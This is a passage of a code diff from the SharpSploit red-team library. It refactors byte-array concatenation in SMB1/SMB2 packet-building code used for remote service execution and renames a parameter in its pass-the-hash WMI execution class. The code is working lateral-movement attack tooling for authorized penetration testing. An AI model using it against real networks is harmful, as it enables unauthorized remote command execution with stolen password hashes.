+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
                                         SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
@@ -2006,19 +1983,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, RPC_data);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SCM_data);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                             byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                     }
                                     break;
@@ -2030,7 +2001,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
                                         byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
@@ -2041,15 +2012,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
                                             byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "TreeDisconnect";
                                     }
@@ -2062,7 +2031,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
                                         byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
@@ -2074,15 +2043,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
                                             byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "Logoff";
                                     }
@@ -2095,7 +2062,7 @@ namespace SharpSploit.LateralMovement
                                         {
                                             packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
                                             SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = Utilities.CombineByteArray(BitConverter.GetBytes(SMB_signing_counter), new byte[] { 0x00, 0x00, 0x00, 0x00 });
+                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
                                         }
                                         byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
@@ -2107,15 +2074,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = Utilities.CombineByteArray(session_key, SMB_header);
-                                            SMB_Sign = Utilities.CombineByteArray(SMB_Sign, SMB_data);
+                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
                                             byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
                                             packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
                                             SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "exit";
                                     }
@@ -2151,14 +2116,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "CreateRequest";
                                     }
@@ -2183,14 +2147,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "RPCBind";
                                     }
@@ -2217,16 +2180,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
-                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "ReadRequest";
                                         SMB_client_stage_next = "OpenSCManagerW";
@@ -2252,14 +2212,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) != "03-01-00-00")
                                         {
@@ -2304,18 +2263,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
-                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
-                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, SCM_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "ReadRequest";
                                         SMB_client_stage_next = "CheckAccess";
@@ -2386,18 +2340,13 @@ namespace SharpSploit.LateralMovement
                                             if (SMB_signing)
                                             {
                                                 HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                                byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
-                                                SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
-                                                SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, SCM_data);
+                                                byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                                 byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                                 SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                                 packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                                 SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                             }
-                                            SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
-                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
-                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                            SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                             SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                             SMBClientStage = "ReadRequest";
                                             SMB_client_stage_next = "StartServiceW";
@@ -2430,16 +2379,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
-                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
 
                                         if (SMB_split_stage_final <= 2)
@@ -2478,16 +2424,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
-                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         if (SMB_split_stage >= SMB_split_stage_final)
                                         {
@@ -2521,16 +2464,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
-                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "ReadRequest";
                                         SMB_client_stage_next = "StartServiceW";
@@ -2563,18 +2503,13 @@ namespace SharpSploit.LateralMovement
                                             if (SMB_signing)
                                             {
                                                 HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                                byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
-                                                SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
-                                                SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, SCM_data);
+                                                byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                                 byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                                 SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                                 packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                                 SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                             }
-                                            SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
-                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
-                                            SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                            SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                             SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                             SMBClientStage = "ReadRequest";
                                             SMB_client_stage_next = "DeleteServiceW";
@@ -2624,18 +2559,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
-                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
-                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, SCM_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "ReadRequest";
                                         SMB_client_stage_next = "CloseServiceHandle";
@@ -2678,18 +2608,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
-                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, RPC_data);
-                                            SMB2_Sign = Utilities.CombineByteArray(SMB2_Sign, SCM_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, RPC_data);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SCM_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
 
                                     }
@@ -2712,14 +2637,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "TreeDisconnect";
                                     }
@@ -2742,14 +2666,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "Logoff";
                                     }
@@ -2771,14 +2694,13 @@ namespace SharpSploit.LateralMovement
                                         if (SMB_signing)
                                         {
                                             HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = Utilities.CombineByteArray(SMB2_header, SMB2_data);
+                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
                                             byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
                                             packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
                                             SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
                                         }
-                                        SMB_client_send = Utilities.CombineByteArray(NetBIOS_session_service, SMB2_header);
-                                        SMB_client_send = Utilities.CombineByteArray(SMB_client_send, SMB2_data);
+                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
                                         SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
                                         SMBClientStage = "exit";
                                     }

--- a/SharpSploit/LateralMovement/PassTheHash.cs
+++ b/SharpSploit/LateralMovement/PassTheHash.cs
@@ -16,21 +16,21 @@ namespace SharpSploit.LateralMovement
     public class PassTheHash
     {
         /// <summary>
-        /// Determines if a username and hash has administrative privilege on a target
+        /// Determines if a username and hash has administrative privilege on a Target
         /// </summary>
         /// <param name="username">The Username to query.</param>
         /// <param name="hash">The NTLM hash for the user</param>
         /// <param name="domain">The logon domain for the user</param>
-        /// <param name="target">The target to query.</param>
+        /// <param name="Target">The Target to query.</param>
         /// <returns>True for Admin, False for not.</returns>
         /// <author>Scottie Austin (@checkymander)</author>
         /// <remarks>
         /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
         /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
         /// </remarks>
-        public static bool WMIAdminCheck(string username, string hash, string domain, string target)
+        public static bool WMIAdminCheck(string username, string hash, string domain, string Target)
         {
-            string result = WMIExecute(username, hash, domain, target, AdminCheck: true);
+            string result = WMIExecute(username, hash, domain, Target, AdminCheck: true);
             if (result.Contains(" is a local administrator on "))
                 return true;
             else
@@ -43,10 +43,10 @@ namespace SharpSploit.LateralMovement
         /// <param name="username">The username to log on as.</param>
         /// <param name="hash">The NTLM hash for the user.</param>
         /// <param name="domain">The logon domain for the user.</param>
-        /// <param name="targets">The target computers to run the command on.</param>
-        /// <param name="command">The Command to execute on the target</param>
+        /// <param name="targets">The Target computers to run the command on.</param>
+        /// <param name="command">The Command to execute on the Target</param>
         /// <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
-        /// <param name="AdminCheck">Check if user is an Admin on the target only.</param>
+        /// <param name="AdminCheck">Check if user is an Admin on the Target only.</param>
         /// <param name="debug">Include debug information in the output</param>
         /// <returns>Returns a string containing execution results.</returns>
         /// <author>Scottie Austin (@checkymander)</author>
@@ -57,24 +57,24 @@ namespace SharpSploit.LateralMovement
         public static string WMIExecute(string username, string hash, string domain, List<string> targets, string command = "", int sleep = 15, bool AdminCheck = false, bool debug = false)
         {
             StringBuilder sb = new StringBuilder();
-            foreach (var target in targets)
+            foreach (var Target in targets)
             {
-                sb.AppendLine(WMIExecute(username, hash, domain, target, command, sleep, AdminCheck, debug));
+                sb.AppendLine(WMIExecute(username, hash, domain, Target, command, sleep, AdminCheck, debug));
             }
 
             return sb.ToString();
         }
 
         /// <summary>
-        /// Execute a command against a target using Pass the Hash and WMI
+        /// Execute a command against a Target using Pass the Hash and WMI
         /// </summary>
         /// <param name="username">The username to log on as.</param>
         /// <param name="hash">The NTLM hash for the user.</param>
         /// <param name="domain">The logon domain for the user.</param>
-        /// <param name="target">The target computers to run the command on.</param>
-        /// <param name="command">The Command to execute on the target.</param>
+        /// <param name="Target">The Target computers to run the command on.</param>
+        /// <param name="command">The Command to execute on the Target.</param>
         /// <param name="sleep">Sleeptime between actions. Set this if getting unknown failures. (default=15). </param>
-        /// <param name="AdminCheck">Check if user is an Admin on the target only.</param>
+        /// <param name="AdminCheck">Check if user is an Admin on the Target only.</param>
         /// <param name="debug">Include debug information in the output.</param>
         /// <returns>Returns a string containing execution results.</returns>
         /// <author>Scottie Austin (@checkymander)</author>
@@ -82,49 +82,48 @@ namespace SharpSploit.LateralMovement
         /// Based Heavily on Kevin Robertsons Invoke-TheHash toolset (Found
         /// at https://github.com/Kevin-Robertson/Invoke-TheHash)
         /// </remarks>
